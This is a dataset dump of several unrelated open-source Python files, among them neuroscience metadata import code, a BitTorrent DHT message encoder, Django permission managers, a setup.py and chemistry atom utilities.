code | repo_name | path | language | license | size
---|---|---|---|---|---
stringlengths 3-1.05M | stringlengths 5-104 | stringlengths 4-251 | stringclasses 1 value | stringclasses 15 values | int64 3-1.05M
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 18 15:37:41 2013
@author: Shreejoy
"""
import neuroelectro.models as m
from fuzzywuzzy import fuzz, process
from html_table_decode import resolveDataFloat
import re
import xlrd
import numpy as np
import csv
from assign_metadata import validate_temp_list, validate_age_list
def load_annotated_article_ephys():
print 'Updating ephys defs'
print 'Loading ephys defs'
book = xlrd.open_workbook("data/article_metadata_ephys_annotations.xlsx")
#os.chdir('C:\Python27\Scripts\Biophys')
sheet = book.sheet_by_index(0)
ncols = sheet.ncols
nrows = sheet.nrows
table= [ [ 0 for i in range(ncols) ] for j in range(nrows ) ]
for i in range(nrows):
for j in range(ncols):
value = sheet.cell(i,j).value
value = value.strip()
if value is None:
value = ''
table[i][j] = value
return table, ncols, nrows
anon_user = m.get_anon_user()
def process_table(table, ncols, nrows):
table_norm = [ [ 0 for i in range(6) ] for j in range(nrows ) ]
table_norm = np.zeros([nrows, 6], dtype='a16')
for i in range(1,nrows):
pmid = table[i][2]
# neuron_type = table[i][5]
#n = m.Neuron.objects.filter(name = neuron_type)[0]
species = table[i][7]
strain = table[i][8]
age = table[i][9]
electrode = table[i][10]
prep_type = table[i][12]
temp = table[i][11]
a = m.Article.objects.filter(pmid = pmid)[0]
#print a
m.ArticleMetaDataMap.objects.filter(article = a).delete()
# print a
temp_norm_dict = temp_resolve(unicode(temp))
#print temp_norm_dict
# temp_dict_fin = validate_temp_list([temp_norm_dict])
add_continuous_metadata('RecTemp', temp_norm_dict, a)
age_norm_dict = age_resolve(unicode(age))
#print age_norm_dict
# age_dict_fin = validate_age_list([age_norm_dict])
# print temp_dict_fin
add_continuous_metadata('AnimalAge', age_norm_dict, a)
weight_norm = weight_resolve(unicode(age))
# print temp_dict_fin
add_continuous_metadata('AnimalWeight', weight_norm, a)
strain_norm = strain_resolve(unicode(strain))
if strain_norm != '':
add_nominal_metadata('Strain', strain_norm, a)
prep_norm = preptype_resolve(unicode(prep_type))
if prep_norm != '':
add_nominal_metadata('PrepType', prep_norm, a)
electrode_norm = electrodetype_resolve(unicode(electrode))
#print (electrode, electrode_norm)
if electrode_norm != '':
add_nominal_metadata('ElectrodeType', electrode_norm, a)
species_norm = species_resolve(unicode(species))
if species_norm != '':
add_nominal_metadata('Species', species_norm, a)
if a.articlefulltext_set.all().count() > 0:
afts = m.ArticleFullTextStat.objects.get_or_create(article_full_text__article = a)[0]
afts.metadata_human_assigned = True
#print afts.metadata_human_assigned
afts.save()
# row = [species_norm, strain_norm, age_norm, electrode_norm, temp_norm, prep_norm]
# for j in range(0,len(row)):
# table_norm[i,j] = row[j]
# return table_norm
#name = 'Species', value = 'Rats'
def add_nominal_metadata(name, value, article):
metadata_ob = m.MetaData.objects.get_or_create(name=name, value=value)[0]
amd_ob = m.ArticleMetaDataMap.objects.get_or_create(article=article, metadata = metadata_ob)[0]
if amd_ob.added_by:
pass
else:
amd_ob.added_by = anon_user
amd_ob.save()
def add_continuous_metadata(name, value_dict, article):
if 'value' in value_dict:
min_range = None
max_range = None
stderr = None
if 'min_range' in value_dict:
min_range = value_dict['min_range']
if 'max_range' in value_dict:
max_range = value_dict['max_range']
if 'error' in value_dict:
stderr = value_dict['error']
cont_value_ob = m.ContValue.objects.get_or_create(mean = value_dict['value'], min_range = min_range,
max_range = max_range, stderr = stderr)[0]
metadata_ob = m.MetaData.objects.get_or_create(name=name, cont_value=cont_value_ob)[0]
amd_ob = m.ArticleMetaDataMap.objects.get_or_create(article=article, metadata = metadata_ob)[0]
if amd_ob.added_by:
# if amd_ob already exists (i.e. was added by a robot), don't mark it as assigned by a human
pass
else:
amd_ob.added_by = anon_user
amd_ob.save()
def write_metadata(table_norm):
csvout = csv.writer(open("mydata.csv", "wb"))
csvout.writerow(("Species", "Strain", "Age", "ElectrodeType", "Temp", "PrepType"))
for row in table_norm:
csvout.writerow(row)
# print temp_resolve(unicode(temp))
#print age_resolve(unicode(age))
#print strain_resolve(unicode(strain))
# print preptype_resolve(unicode(prep_type))
# print resolveDataFloat(temp)
roomtemp_re = re.compile(ur'room|room\stemp|RT' , flags=re.UNICODE|re.IGNORECASE)
def temp_resolve(inStr):
# check if contains room temp or RT
if roomtemp_re.findall(inStr):
inStr = u'20-24'
retDict = resolveDataFloat(inStr)
# value = 22
else:
retDict = resolveDataFloat(inStr)
# if 'value' in retDict:
# value = retDict['value']
# else:
# value = ''
return retDict
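# Added illustration (not in the original source): free-text temperatures that
# mention "room temperature"/"RT" are rewritten to an assumed 20-24 C range
# before numeric parsing, so, assuming resolveDataFloat returns a dict keyed by
# 'value'/'min_range'/'max_range', a call would look roughly like:
#
#   temp_resolve(u'recordings at RT')
#   # -> something like {'value': 22.0, 'min_range': 20.0, 'max_range': 24.0}
#   # (the exact keys and values depend on resolveDataFloat)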
weight_re = re.compile(ur'weight' , flags=re.UNICODE|re.IGNORECASE)
week_re = re.compile(ur'week|wk' , flags=re.UNICODE|re.IGNORECASE)
month_re = re.compile(ur'month|mo' , flags=re.UNICODE|re.IGNORECASE)
def age_resolve(inStr):
# check if contains room temp or RT
if weight_re.findall(inStr):
retDict = ''
return retDict
else:
retDict = resolveDataFloat(unicode(inStr))
if 'value' in retDict:
if week_re.findall(inStr):
for k in retDict.keys():
retDict[k] = retDict[k] * 7
elif month_re.findall(inStr):
for k in retDict.keys():
retDict[k] = retDict[k] * 30
# value = retDict['value']
# if week_re.findall(inStr):
# value = value * 7
# elif month_re.findall(inStr):
# value = value * 30
else:
retDict = ''
return retDict
def weight_resolve(inStr):
if weight_re.findall(inStr):
retDict = resolveDataFloat(unicode(inStr))
return retDict
else:
return ''
strain_list = m.MetaData.objects.filter(name = 'Strain')
strain_list_values = [md.value for md in strain_list]
matchThresh = 70
def strain_resolve(inStr):
if len(inStr.split()) < 1:
return ''
processOut, matchVal = process.extractOne(inStr, strain_list_values)
if matchVal > matchThresh:
return processOut
else:
return ''
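# Added sketch of the fuzzy-matching pattern shared by the *_resolve helpers:
# fuzzywuzzy's process.extractOne returns the best (choice, score) pair, and a
# score at or below the threshold of 70 is treated as "no match". The choice
# list below is made up for illustration; the real lists come from m.MetaData.
#
#   from fuzzywuzzy import process
#   choices = ['Sprague-Dawley', 'Wistar', 'C57BL/6']
#   best, score = process.extractOne('sprague dawley rats', choices)
#   strain = best if score > 70 else ''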
jxn_list = m.MetaData.objects.filter(name = 'JxnPotential')
jxn_list_values = [md.value for md in jxn_list]
matchThresh = 70
def jxn_resolve(inStr):
if len(inStr.split()) < 1:
return ''
processOut, matchVal = process.extractOne(inStr, jxn_list_values)
if matchVal > matchThresh:
return processOut
else:
return ''
preptype_list = m.MetaData.objects.filter(name = 'PrepType')
preptype_list_values = [md.value for md in preptype_list]
matchThresh = 70
def preptype_resolve(inStr):
if len(inStr) < 1:
return ''
processOut, matchVal = process.extractOne(inStr, preptype_list_values)
if matchVal > matchThresh:
return processOut
else:
return ''
electrode_list = m.MetaData.objects.filter(name = 'ElectrodeType')
electrode_list_values = [md.value for md in electrode_list]
electrode_list_values.append('Whole-cell')
matchThresh = 70
def electrodetype_resolve(inStr):
if len(inStr) < 1:
return ''
# print inStr
processOut, matchVal = process.extractOne(inStr, electrode_list_values)
if matchVal > matchThresh:
if processOut == 'Whole-cell':
return 'Patch-clamp'
else:
return processOut
else:
return ''
species_list = m.MetaData.objects.filter(name = 'Species')
species_list_values = [md.value for md in species_list]
rat_re = re.compile('rat|rats', flags=re.UNICODE|re.IGNORECASE)
mouse_re = re.compile('mouse|mice', flags=re.UNICODE|re.IGNORECASE)
def species_resolve(inStr):
matchThresh = 70
if len(inStr) < 1:
species = ''
elif mouse_re.findall(inStr):
species = 'Mice'
elif rat_re.findall(inStr):
species = 'Rats'
else:
processOut, matchVal = process.extractOne(inStr, species_list_values)
if matchVal > matchThresh:
species = processOut
return species
else:
species = ''
return species
#def strain_resolve(inStr):
| neuroelectro/neuroelectro_org | db_functions/metadata_annotation_import.py | Python | gpl-2.0 | 9,457 |
from utils import TRUE, ERROR
class Atom:
# Empty default constructor
def __init__(self):
pass
# String constructor for atoms
@classmethod
def fromString(self, string):
newAtom = Atom()
if '(' not in string:
# no arguments
newAtom.pred = string
newAtom.args = []
else:
newAtom.pred = string.split('(')[0]
newAtom.args = string.split('(')[1].split(')')[0].split(',')
newAtom.checkRemote()
return newAtom
def getCopy(self):
copyAtom = Atom()
copyAtom.pred = self.pred
copyAtom.args = []
for arg in self.args:
copyAtom.args.append(arg)
return copyAtom
def checkRemote(self):
if '@' in self.pred:
self.remote = True
self.address = self.pred.split('@')[1]
self.table = self.pred.split('@')[0]
else:
self.remote = False
def replaceArg(self, old, new):
self.args = [x if x != old else new for x in self.args]
def vars(self):
listVars = [arg if arg.isupper() else 'dummy' for arg in self.args]
setVars = set(listVars)
if 'dummy' in setVars:
setVars.remove('dummy')
return setVars
def consts(self):
listConsts = [arg if arg.islower() else 'dummy' for arg in self.args]
setConsts = set(listConsts)
if 'dummy' in setConsts:
setConsts.remove('dummy')
return setConsts
def isGround(self):
return len(self.vars()) == 0
def __str__(self):
string = self.pred
if len(self.args) > 0:
string = string + '(' + ', '.join(self.args) + ')'
return string
def getProposition(self):
return self.pred + '_' + '_'.join(self.args)
def toDatalog(self, v):
string = self.pred + '_' + v
if len(self.args) > 0:
string = string + '(' + ', '.join(self.args) + ')'
return string
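# Added usage illustration (not part of the original module): upper-case
# arguments are treated as variables and lower-case ones as constants.
#
#   a = Atom.fromString('canRead(X,file1)')
#   a.pred              # 'canRead'
#   a.vars()            # set(['X'])
#   a.consts()          # set(['file1'])
#   a.getProposition()  # 'canRead_X_file1'
#   a.toDatalog('v1')   # 'canRead_v1(X, file1)'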
def __hash__(self):
return hash(str(self))
def __eq__(self, other):
return (self.pred, self.args) == (other.pred, other.args)
| ptsankov/bellog-analysis | code/atom.py | Python | gpl-3.0 | 2,277 |
#!/usr/bin/python
#coding=utf8
# by luwei
# begin:2013-9-11
# developing...
import sys,os
import types
reload(sys)
sys.setdefaultencoding('utf-8')
# values should be converted to network byte order first
'''
bencoding (encode outgoing KRPC messages)
'''
def req_ping_encode(dic):
try:
# encode a ping query
if dic.has_key('q') and dic['q'] == 'ping':
return 'd1:ad2:id20:' + dic['a']['id'] + \
'e1:q4:ping1:t' + str(len(dic['t'])) + \
':' + dic['t'] + '1:y1:qe'
except ValueError:
return ''
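# Added illustration: with a 20-byte node id and the transaction id 'aa', the
# encoder above yields the standard BEP 5 ping query, e.g.
#
#   req_ping_encode({'q': 'ping', 't': 'aa', 'a': {'id': 'abcdefghij0123456789'}})
#   # -> 'd1:ad2:id20:abcdefghij0123456789e1:q4:ping1:t2:aa1:y1:qe'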
def req_find_node_encode(dic):
try:
# encode a find_node query
if dic.has_key('q') and dic['q'] == 'find_node':
return 'd1:ad2:id20:' + dic['a']['id'] + \
'6:target20:' + dic['a']['target'] + \
'e1:q9:find_node1:t' + str(len(dic['t'])) + \
':' + dic['t'] + '1:y1:qe'
except ValueError:
return ''
def req_get_peers_encode(dic):
try:
# encode a get_peers query
if dic.has_key('q') and dic['q'] == 'get_peers':
return 'd1:ad2:id20:' + dic['id'] + \
'9:info_hash20:' + dic['info_hash'] + \
'e1:q9:get_peers1:t' + str(len(dic['t'])) + \
':' + dic['t'] + '1:y1:qe'
except ValueError:
return ''
def req_announce_peer_encode(dic):
try:
# encode an announce_peer query
if dic.has_key('q') and dic['q'] == 'announce_peer':
return 'd1:ad2:id20:' + dic['id'] + \
'9:info_hash20:' + dic['info_hash'] + \
'4:porti' + dic['port'] + 'e5:token' +\
str(len(dic['token'])) + ':' + dic['token'] + \
'e1:q13:announce_peer1:t' + str(len(dic['t'])) + \
':' + dic['t'] + '1:y1:qe'
except ValueError:
return ''
def res_encode(dic):
'''
For get_peers, the crawler never answers
with actual peers, because it simply has "none";
it can only answer with the 8 closest nodes.
'''
try:
# encode a get_peers response
if dic.has_key('r') and dic['r'].has_key('token'):
return 'd1:rd2:id20:' + dic['r']['id'] + \
'5:nodes' + str(len(dic['r']['nodes'])) + \
':' + dic['r']['nodes'] + '5:token' + \
str(len(dic['r']['token'])) + ':' + dic['r']['token'] + \
'e1:t' + str(len(dic['t'])) + ':' + dic['t'] + \
'1:y1:re'
# encode a find_node response
elif dic.has_key('r') and dic['r'].has_key('nodes'):
return 'd1:rd2:id20:' + dic['r']['id'] + \
'5:nodes' + str(len(dic['r']['nodes'])) + \
':' + dic['r']['nodes'] + 'e1:t' + str(len(dic['t'])) + \
':' + dic['t'] + '1:y1:re'
# encode any other response
elif dic.has_key('r'):
return 'd1:rd2:id20:' + dic['r']['id'] + \
'e1:t' + str(len(dic['t'])) + ':' + \
dic['t'] + '1:y1:re'
except ValueError:
return ''
# convert to host byte order after decoding
'''
decoding of incoming KRPC messages
'''
def find_value(temp, key, index):
try:
return temp[temp.index(key) + 1][:index]
except (ValueError, AttributeError):
return ''
def req_ping_decode(string):
# decode a ping query
res = {}
try:
temp = string.split(':')
res['t'] = find_value(temp, 't2', -1)
res['y'] = find_value(temp, 'y1', -1)
res['q'] = find_value(temp, 'q4', -1)
res['a'] = {'id':find_value(temp, 'id20', -2)}
return res
except (ValueError, KeyError):
return {}
def req_find_node_decode(string):
# decode a find_node query
res = {}
try:
temp = string.split(':')
res['t'] = find_value(temp, 't2', -1)
res['y'] = find_value(temp, 'y1', -1)
res['q'] = find_value(temp, 'q9', -1)
res['a'] = {'id':find_value(temp, 'id20', -1), \
'target':find_value(temp, 'target20', -2)}
return res
except (ValueError, KeyError):
return {}
def req_get_peers_decode(string):
# decode a get_peers query
res = {}
try:
temp = string.split(':')
res['t'] = find_value(temp, 't2', -1)
res['y'] = find_value(temp, 'y1', -1)
res['q'] = find_value(temp, 'q9', -1)
res['a'] = {'id':find_value(temp, 'id20', -1), \
'info_hash':find_value(temp, 'info_hash20', -2)}
return res
except (ValueError, KeyError):
return {}
def req_announce_peer_decode(string):
# decode an announce_peer query
res = {}
try:
temp = string.split(':')
res['t'] = find_value(temp, 't2', -1)
res['y'] = find_value(temp, 'y1', -1)
res['q'] = find_value(temp, 'q13', -1)
res['a'] = {'id':find_value(temp, 'id20', -1), \
'info_hash':find_value(temp, 'info_hash20', -1), \
'port':string[string.index('porti') + 5:string.index('e5')], \
'token':temp[temp.index('q13') - 1][:-2]}
return res
except (ValueError, KeyError):
return {}
def res_ping_decode(string):
# decode a ping response
res = {}
try:
temp = string.split(':')
res['t'] = find_value(temp, 't2', -1)
res['y'] = find_value(temp, 'y1', -1)
res['r'] = {'id':find_value(temp, 'id20', -2)}
return res
except (ValueError, KeyError):
return {}
def res_find_node_decode(string):
# decode a find_node response
res = {}
try:
temp = string.split(':')
res['t'] = find_value(temp, 't2', -1)
res['y'] = find_value(temp, 'y1', -1)
res['r'] = {'id':find_value(temp, 'id20', -1), \
'nodes':find_value(temp, 'nodes9', -2)}
return res
except (ValueError, KeyError):
return {}
'''
The crawler never sends get_peers or announce_peer,
so it will never receive responses to them and
there is no need to decode those responses.
'''
| zerleft/magnet_search | bcoder.py | Python | apache-2.0 | 5,993 |
# -*- coding: utf-8 -*-
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
long_description = """
============
Secretary
============
Take the power of Jinja2 templates to OpenOffice or LibreOffice and create reports and letters in your web applications.
See full `documentation on Github <https://github.com/christopher-ramirez/secretary/blob/master/README.md>`_
."""
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
setup(
name='secretary',
version='0.2.7',
url='https://github.com/christopher-ramirez/secretary',
license='MIT',
author='Christopher Ramírez',
author_email='[email protected]',
description='Take the power of Jinja2 templates to OpenOffice or LibreOffice.',
long_description=long_description,
py_modules=['secretary', 'markdown_map'],
platforms='any',
install_requires=[
'Jinja2', 'markdown2'
],
tests_require=['pytest'],
cmdclass={'test': PyTest},
test_suite='test_secretary',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: End Users/Desktop',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Development Status :: 3 - Alpha',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Office/Business',
'Topic :: Utilities',
],
extras_require={
'testing': ['pytest']
}
)
| smontoya/secretary | setup.py | Python | mit | 1,694 |
from mieli.api import organization
from django.db import transaction
from django.conf import settings
from agora.api import link
@transaction.atomic
def create(user, **kwargs):
org = organization.get_by_username(user.username)
if org == None:
raise Exception("unknown organization for user '%s'" % user.username)
lnk = link.get(organization=org, user='agora')
if lnk == None:
raise Exception("no Agora Voting's admin link for organization '%s'" % org.domain)
kwargs = {}
kwargs['username'] = get_agora_username(user)
kwargs['password1'] = kwargs['password2'] = settings.AGORA_DEFAULT_KEY
kwargs['email'] = user.email
kwargs['first_name'] = 'Mieli user'
kwargs['__auth'] = True
r = lnk.post('user/register', **kwargs)
if 'errors' in r:
raise Exception(r['errors'])
login_kwargs = {}
login_kwargs['identification'] = kwargs['username']
login_kwargs['password'] = kwargs['password2']
login_ = login(lnk, **login_kwargs)
link_kwargs = {}
link_kwargs['user'] = kwargs['username']
link_kwargs['token'] = login_['apikey']
link.create(org.domain, **link_kwargs)
def login(lnk, identification, password=settings.AGORA_DEFAULT_KEY):
return lnk.post('user/login', identification=identification, password=password, __session=True)
@transaction.atomic
def delete(user, **kwargs):
org = organization.get_by_username(user.username)
if org == None:
raise Exception("unknown organization for user '%s'" % user.username)
link_kwargs = {}
link_kwargs['user'] = get_agora_username(user)
link.delete(org.domain, **link_kwargs)
def get_agora_username(user):
return user.username.replace('@', '_at_')
| pirata-cat/mieli | agora/api/user.py | Python | agpl-3.0 | 1,722 |
"""Various file utilities."""
import os
import fnmatch
def locate(pattern, root=os.curdir):
"""Locate all files matching pattern in and below given root directory."""
for path, dirs, files in os.walk(os.path.abspath(root)):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(path, filename)
def find_file(pattern, root=os.curdir):
"""Return first occurence of matching file in and below root.
If no occurence file, raises a FileNotFoundError.
"""
for path in locate(pattern, root=root):
return path
raise FileNotFoundError(pattern)
def walk(storage, top='/', topdown=True, onerror=None):
"""Implement os.walk using a Django storage.
Refer to the documentation of os.walk().
Inspired by: https://gist.github.com/btimby/2175107
Parameters
----------
storage : django.Storage
top : str, optional
Same role as in os.walk().
The path at which the walk should begin. Root directory by default.
topdown : bool, optional
Same role and default value as in os.walk().
onerror : function, optional
Same role and default value as in os.walk().
"""
try:
dirs, nondirs = storage.listdir(top)
except (os.error, Exception) as err:
if onerror is not None:
onerror(err)
return
if topdown:
yield top, dirs, nondirs
for name in dirs:
new_path = os.path.join(top, name)
# recursively list subdirectories
for top_, dirs_, nondirs_ in walk(storage, top=new_path):
yield top_, dirs_, nondirs_
if not topdown:
yield top, dirs, nondirs
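# Added usage sketch (not in the original module). With a configured Django
# project this mirrors os.walk() over a storage backend; the storage instance
# and the 'uploads/' path below are placeholders.
#
#   from django.core.files.storage import default_storage
#   for top, dirs, files in walk(default_storage, top='uploads/'):
#       print(top, dirs, files)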
| oser-cs/oser-website | core/file_utils.py | Python | gpl-3.0 | 1,674 |
# exploratory-bibliography-06.py
#
# wjt
# 2 feb 2007
#
# http://digitalhistoryhacks.blogspot.com
# chronological strata in recommendations
# (I know this is really ugly and inefficient)
import urllib, time
import xml.dom.minidom
from xml.dom.minidom import Node
import pickle
import anydbm
def get_text(nodelist):
t = ""
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
t = t + node.data
return t
def get_pubyear(asin):
pubdate = '0000-00-00'
baseurl = r'http://webservices.amazon.com/onca/xml?'
service = r'Service=AWSECommerceService'
amazonid = '1THTW69EYJTSND8GNA02'
access = r'&AWSAccessKeyId=' + amazonid
operation = r'&Operation=ItemLookup&ItemId=' + asin
response = r'&ResponseGroup=ItemAttributes'
r = urllib.urlopen(baseurl + service + access + operation + response)
doc = xml.dom.minidom.parse(r)
for pd in doc.getElementsByTagName("PublicationDate"):
pubdate = get_text(pd.childNodes)
return pubdate[0:4]
def incrpair(ftdict, ftkey):
if ftdict.has_key(ftkey):
ftdict[ftkey] = str(int(ftdict[ftkey]) + 1)
else:
ftdict[ftkey] = "1"
from_to = pickle.load(open('tempstorage'))
to_go = len(from_to)
for ftpair in from_to:
from_to_years = anydbm.open('from-to-years', 'c')
checklist = anydbm.open('checklist', 'c')
if str(ftpair) in checklist.keys():
print str(to_go) + " Already did " + str(ftpair)
else:
print str(to_go) + " Processing " + str(ftpair)
time.sleep(1.2)
fyear = get_pubyear(ftpair[0])
time.sleep(1.2)
tyear = get_pubyear(ftpair[1])
yearpair = str(fyear + " - " + tyear)
print yearpair
incrpair(from_to_years, yearpair)
checklist[str(ftpair)] = "1"
to_go = to_go - 1
from_to_years.close()
checklist.close()
from_to_years = anydbm.open('from-to-years', 'c')
outfile = open('from-to-years.csv', 'w')
for k in from_to_years.keys():
outstr = k[0:4] + ',' + k[7:11] + ',' + from_to_years[k] + "\n"
outfile.write(outstr)
from_to_years.close()
outfile.close()
| williamjturkel/Digital-History-Hacks--2005-08- | exploratory-bibliography-06.py | Python | mit | 2,200 |
from __future__ import unicode_literals
from django.db import models
from django.contrib.contenttypes.models import ContentType
from guardian.exceptions import ObjectNotPersisted
from guardian.models import Permission
import warnings
# TODO: consolidate UserObjectPermissionManager and GroupObjectPermissionManager
class BaseObjectPermissionManager(models.Manager):
def is_generic(self):
try:
self.model._meta.get_field('object_pk')
return True
except models.fields.FieldDoesNotExist:
return False
class UserObjectPermissionManager(BaseObjectPermissionManager):
def assign_perm(self, perm, user, obj):
"""
Assigns permission with given ``perm`` for an instance ``obj`` and
``user``.
"""
if getattr(obj, 'pk', None) is None:
raise ObjectNotPersisted("Object %s needs to be persisted first"
% obj)
ctype = ContentType.objects.get_for_model(obj)
permission = Permission.objects.get(content_type=ctype, codename=perm)
kwargs = {'permission': permission, 'user': user}
if self.is_generic():
kwargs['content_type'] = ctype
kwargs['object_pk'] = obj.pk
else:
kwargs['content_object'] = obj
obj_perm, created = self.get_or_create(**kwargs)
return obj_perm
def assign(self, perm, user, obj):
""" Depreciated function name left in for compatibility"""
warnings.warn("UserObjectPermissionManager method 'assign' is being renamed to 'assign_perm'. Update your code accordingly as old name will be depreciated in 1.0.5 version.", DeprecationWarning)
return self.assign_perm(perm, user, obj)
def remove_perm(self, perm, user, obj):
"""
Removes permission ``perm`` for an instance ``obj`` and given ``user``.
"""
if getattr(obj, 'pk', None) is None:
raise ObjectNotPersisted("Object %s needs to be persisted first"
% obj)
filters = {
'permission__codename': perm,
'permission__content_type': ContentType.objects.get_for_model(obj),
'user': user,
}
if self.is_generic():
filters['object_pk'] = obj.pk
else:
filters['content_object__pk'] = obj.pk
self.filter(**filters).delete()
def get_for_object(self, user, obj):
if getattr(obj, 'pk', None) is None:
raise ObjectNotPersisted("Object %s needs to be persisted first"
% obj)
ctype = ContentType.objects.get_for_model(obj)
perms = self.filter(
content_type = ctype,
user = user,
)
return perms
class GroupObjectPermissionManager(BaseObjectPermissionManager):
def assign_perm(self, perm, group, obj):
"""
Assigns permission with given ``perm`` for an instance ``obj`` and
``group``.
"""
if getattr(obj, 'pk', None) is None:
raise ObjectNotPersisted("Object %s needs to be persisted first"
% obj)
ctype = ContentType.objects.get_for_model(obj)
permission = Permission.objects.get(content_type=ctype, codename=perm)
kwargs = {'permission': permission, 'group': group}
if self.is_generic():
kwargs['content_type'] = ctype
kwargs['object_pk'] = obj.pk
else:
kwargs['content_object'] = obj
obj_perm, created = self.get_or_create(**kwargs)
return obj_perm
def assign(self, perm, user, obj):
""" Depreciated function name left in for compatibility"""
warnings.warn("UserObjectPermissionManager method 'assign' is being renamed to 'assign_perm'. Update your code accordingly as old name will be depreciated in 1.0.5 version.", DeprecationWarning)
return self.assign_perm(perm, user, obj)
def remove_perm(self, perm, group, obj):
"""
Removes permission ``perm`` for an instance ``obj`` and given ``group``.
"""
if getattr(obj, 'pk', None) is None:
raise ObjectNotPersisted("Object %s needs to be persisted first"
% obj)
filters = {
'permission__codename': perm,
'permission__content_type': ContentType.objects.get_for_model(obj),
'group': group,
}
if self.is_generic():
filters['object_pk'] = obj.pk
else:
filters['content_object__pk'] = obj.pk
self.filter(**filters).delete()
def get_for_object(self, group, obj):
if getattr(obj, 'pk', None) is None:
raise ObjectNotPersisted("Object %s needs to be persisted first"
% obj)
ctype = ContentType.objects.get_for_model(obj)
perms = self.filter(
content_type = ctype,
group = group,
)
return perms
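# Added usage sketch (not part of django-guardian itself). Through the models'
# managers these methods are typically reached as, e.g.:
#
#   from guardian.models import UserObjectPermission
#   UserObjectPermission.objects.assign_perm('change_article', user, article)
#   UserObjectPermission.objects.remove_perm('change_article', user, article)
#
# where 'change_article', user and article stand in for a real permission
# codename and persisted model instances.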
| mozilla/captain | vendor/lib/python/guardian/managers.py | Python | mpl-2.0 | 4,947 |
# -*- coding: utf-8 -*-
# This is a free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ASE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
import numpy as np
import QCkit.physical_constants as constants
class Atom(object):
def __init__(self, sym=None, coords=[], coord_units="bohr"):
"""
default constructor of atom object
:param sym: chemical symbol of atom
:param coords: cartesian coordinates of the atom, in units
:param coord_units: the units in which coordinates are provided, can
be bohr or angstroms (angs, Angs, etc.); anything with first letter 'A'
"""
# make sure chemical symbol has the correct
# letter-case form
sym = correct_symbol_case(sym)
self.symbol = str(sym)
# set mass
self.mass = mass_for_sym(sym)
# verify correctness of input
if np.array(coords, dtype=float).size == 3:
# if units are given in Angstroms, convert to bohr
if coord_units[0].lower() == "a":
self._xyz = np.array(coords).astype(np.float64) * constants.angstrom_to_bohr
else:
self._xyz = np.array(coords).astype(np.float64)
else:
raise ValueError("error reading the coordinates: \"{}\"".format(coords))
@property
def coords(self):
return self._xyz
@coords.setter
def coords(self, new_coord):
self._xyz = np.copy(new_coord)
@property
def atomic_number(self):
return number_for_sym(self.symbol)
def covalent_radius(self, bond_order=1):
return covalent_radii[self.atomic_number - 1, bond_order - 1]
def __str__(self):
return "{} {} {:< 10.8f} {:< 10.8f} {:< 10.8f}".format(self.symbol, self.mass, self._xyz[0], self._xyz[1],
self._xyz[2])
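# Added example (values approximate, not from the original file): coordinates
# given in Angstrom are converted to bohr on construction.
#
#   h = Atom('h', coords=[0.0, 0.0, 0.74], coord_units='angstrom')
#   h.symbol          # 'H' (letter case normalized)
#   h.coords[2]       # ~1.40 bohr (0.74 Angstrom * ~1.8897)
#   h.atomic_number   # 1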
chemical_symbols = ['X', 'H', 'He', 'Li', 'Be',
'B', 'C', 'N', 'O', 'F',
'Ne', 'Na', 'Mg', 'Al', 'Si',
'P', 'S', 'Cl', 'Ar', 'K',
'Ca', 'Sc', 'Ti', 'V', 'Cr',
'Mn', 'Fe', 'Co', 'Ni', 'Cu',
'Zn', 'Ga', 'Ge', 'As', 'Se',
'Br', 'Kr', 'Rb', 'Sr', 'Y',
'Zr', 'Nb', 'Mo', 'Tc', 'Ru',
'Rh', 'Pd', 'Ag', 'Cd', 'In',
'Sn', 'Sb', 'Te', 'I', 'Xe',
'Cs', 'Ba', 'La', 'Ce', 'Pr',
'Nd', 'Pm', 'Sm', 'Eu', 'Gd',
'Tb', 'Dy', 'Ho', 'Er', 'Tm',
'Yb', 'Lu', 'Hf', 'Ta', 'W',
'Re', 'Os', 'Ir', 'Pt', 'Au',
'Hg', 'Tl', 'Pb', 'Bi', 'Po',
'At', 'Rn', 'Fr', 'Ra', 'Ac',
'Th', 'Pa', 'U', 'Np', 'Pu',
'Am', 'Cm', 'Bk', 'Cf', 'Es',
'Fm', 'Md', 'No', 'Lr']
# this should have the same size as "chemical_symbols" list
atomic_names = [
'', 'Hydrogen', 'Helium', 'Lithium', 'Beryllium', 'Boron',
'Carbon', 'Nitrogen', 'Oxygen', 'Fluorine', 'Neon', 'Sodium',
'Magnesium', 'Aluminium', 'Silicon', 'Phosphorus', 'Sulfur',
'Chlorine', 'Argon', 'Potassium', 'Calcium', 'Scandium',
'Titanium', 'Vanadium', 'Chromium', 'Manganese', 'Iron',
'Cobalt', 'Nickel', 'Copper', 'Zinc', 'Gallium', 'Germanium',
'Arsenic', 'Selenium', 'Bromine', 'Krypton', 'Rubidium',
'Strontium', 'Yttrium', 'Zirconium', 'Niobium', 'Molybdenum',
'Technetium', 'Ruthenium', 'Rhodium', 'Palladium', 'Silver',
'Cadmium', 'Indium', 'Tin', 'Antimony', 'Tellurium',
'Iodine', 'Xenon', 'Caesium', 'Barium', 'Lanthanum',
'Cerium', 'Praseodymium', 'Neodymium', 'Promethium',
'Samarium', 'Europium', 'Gadolinium', 'Terbium',
'Dysprosium', 'Holmium', 'Erbium', 'Thulium', 'Ytterbium',
'Lutetium', 'Hafnium', 'Tantalum', 'Tungsten', 'Rhenium',
'Osmium', 'Iridium', 'Platinum', 'Gold', 'Mercury',
'Thallium', 'Lead', 'Bismuth', 'Polonium', 'Astatine',
'Radon', 'Francium', 'Radium', 'Actinium', 'Thorium',
'Protactinium', 'Uranium', 'Neptunium', 'Plutonium',
'Americium', 'Curium', 'Berkelium', 'Californium',
'Einsteinium', 'Fermium', 'Mendelevium', 'Nobelium',
'Lawrencium', 'Unnilquadium', 'Unnilpentium', 'Unnilhexium']
# this should have the same size as "chemical_symbols" list
